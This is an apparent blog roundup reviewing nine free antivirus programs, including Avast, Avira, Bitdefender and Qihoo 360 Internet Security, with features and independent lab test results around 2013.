360 Internet Security does a reasonable job of blocking access to malicious websites, too, and on balance it's an effective entry to the free antivirus world.
However, there are plenty of free antivirus software solutions on the market, We've picked out nine of the best free internet security tools to deliver great security at no cost.
1. Avast Free Antivirus
The program is simple to install; a straightforward interface makes it easy to use; a quick first scan should identify any potential threats on your PC, and this all has minimal impact on your system performance.
These aren't just subjective opinions, either. Independent testing by AV-Test has found the program to be a good all-rounder, and it was one of AV-Comparative's "Products of 2012."
Avast Free has some useful extras, too. A Software Updater alerts you to program updates you've missed, for instance, while its Browser Cleanup tool provides a simple way to remove unwanted add-ons from your browsers.
Avast recently added a "Grime Fighter," which the company says supports 12 additional languages and offers an advanced console for more user control.
2. Panda Cloud Antivirus Free
Small and simple, Panda Cloud Antivirus is a lightweight tool which provides free real-time antivirus protection, and can be used alongside many other security tools without problems.
It's the free version of a commercial product, and so has a few missing features. The Pro edition helps to protect you at public wifi networks, for instance, while its "USB Vaccine" function reduces the risk of malware infecting a USB drive.
The core antivirus protection remains the same, though. And while that doesn't deliver the top detection rates, independent testing shows it's very capable, with the program winning certification in AV-Test's latest report.
3. ZoneAlarm Free Antivirus + Firewall
We have one or two concerns about ZoneAlarm Free Antivirus + Firewall, notably that its antivirus database is only updated daily (hourly updates are reserved for the commercial version), which leaves you more exposed to the very latest threats,
The program does provide plenty of functionality, though, with a capable, AV-Test-certified antivirus engine, an easy-to-use firewall and some browsing protection.
It does its best to keep things simple. Open the Preferences dialog, say, and you'll find only 10 buttons and settings (and most of those you'll never need to use).
The database update means it wouldn't be our first choice, but if you're a fan of ZoneAlarm, or just want a firewall and antivirus tool from the same company, this could be a good choice.
4. Avira Free Antivirus
Avira Free Antivirus provides two main areas of protection.
A strong antivirus engine (rated highly by independent labs for its file detection rates) constantly monitors your PC, looking for and eliminating threats.
If you choose to install the Avira toolbar then you also get some web tools (an antiphishing tool, ad blocker, social networking protection), although this also replaces your default search engine with an Avira page.
Problems? The interface can seem a little complex, just at first. And the program has more impact on your PC's performance than some other tools. Still, on balance Avira Free Antivirus remains a capable and effective security package.
Avira recently made available the Avira Protection Cloud (APC), which will be used to detect and thwart zero-day attacks, according to the company. The technology will be available to all users of the free software by the end of May.
5. Bitdefender Antivirus Free Edition
Bitdefender's antivirus engine is one of the best around, and a favourite of the independent testing labs, so getting a free version sounds very appealing indeed.
The program is ultra-compact, downloading and installing in less than a minute on our test PC (although it does demand removal of any incompatible products first). A very basic interface then provides effective on-demand and automatic scanning, real-time antivirus and antiphishing protection.
There are very few manual controls here: no settings, no options, no scan types, no scheduling, nothing at all, perhaps an issue if you like to fine tune your security. But if you prefer simplicity then Bitdefender Antivirus Free Edition is an excellent choice.
6. AVG Free Antivirus
AVG Free Antivirus is a solid package with a good range of features: an antivirus engine, email scanner, identity theft protection, and LinkScanner Surf-Shield to keep you safe online.
At first glance this makes the program seem more complex, as there are lots of tiles, buttons and menu entries. Smart interface design means you can carry out most common actions in a click or two, though, so you'll soon feel at home.
AVG Free Antivirus gets mixed reviews on its effectiveness: AV-Comparatives rate it as average, AV-Test say it's better than some commercial suites. Our view: it's a capable, feature-packed tool, and one of the stronger free antivirus packages.
To boost its offering, AVG recently released the AVG Zen tool, which the company claims is designed to help provide added protection across desktops and mobile devices.
Why isn't Microsoft Security Essentials in the list? It's small, simple, and won't slow your system down - but it's also just not reliable enough to justify inclusion in our best free antivirus software round-up.
When Security Essentials was last included in an AV Comparatives File Detection test, the program managed a file detection rate of 94.9%, placing it 13th out of 15. AV-Test's opinion was even lower. In its analysis of 2012 products for Home Users, Microsoft Security Essentials delivered the lowest "average protection score" of all, putting it bottom in a list of 20.
7. Emsisoft Emergency Kit
No antivirus program comes with a guaranteed 100% detection rate, and malware might occasionally slip through your defences. You should always have a second tool available, then, just in case - and Emsisoft Emergency Kit (EEK) is a great choice.
The program runs without requiring installation, reducing the chance of any conflicts with your existing antivirus package.
Its straightforward system scanner uses a dual-scan-engine, rated highly by Virus Bulletin (and which did actually achieve a 100% detection rate in a recent AV-Comparatives test).
And experienced users will appreciate tools like HiJackFree and BlitzBlank, which can help you manually detect and clean up malware.
8. FortiNet FortiClient
While they're best known in the corporate world of network security appliances, FortiNet also produce a capable antivirus tool, FortiClient, which is free for home users.
The program can be installed in two modes. The standard option provides a good range of tools: an antivirus engine, simple parental controls, an application firewall, vulnerability scanning and more. But you can also run FortiClient without its real-time protection, perfect if you need to run it alongside an existing antivirus tool without conflicts.
Our tests suggest it's not the best antivirus engine around, but is still worth having. AV-Test and AV-Comparatives confirm that it's a good mid-range contender, and FortiClient could be particularly helpful if you want a second-line tool to run alongside an existing antivirus engine.
9. 360 Internet Security 2013
Qihoo is a Chinese software company which has had enormous success in its home market (it claims 450 million users), but now it's branching out with its first international release, 360 Internet Security 2013.
Despite its name, this isn't a full internet security suite - there's no spam filter, firewall or parental controls - but installing the program does get you no less than three antivirus engines: BitDefender, its own QVM II, and Cloud 360.
These delivered accurate results for us, and the independent testing labs have also reported positive results for Qihoo products in the past year (AV Comparatives has certified it as "Windows 8 approved", for instance).
360 Internet Security does a reasonable job of blocking access to malicious websites, too, and on balance it's an effective entry to the free antivirus world.
Subscribe to:
Posts (Atom)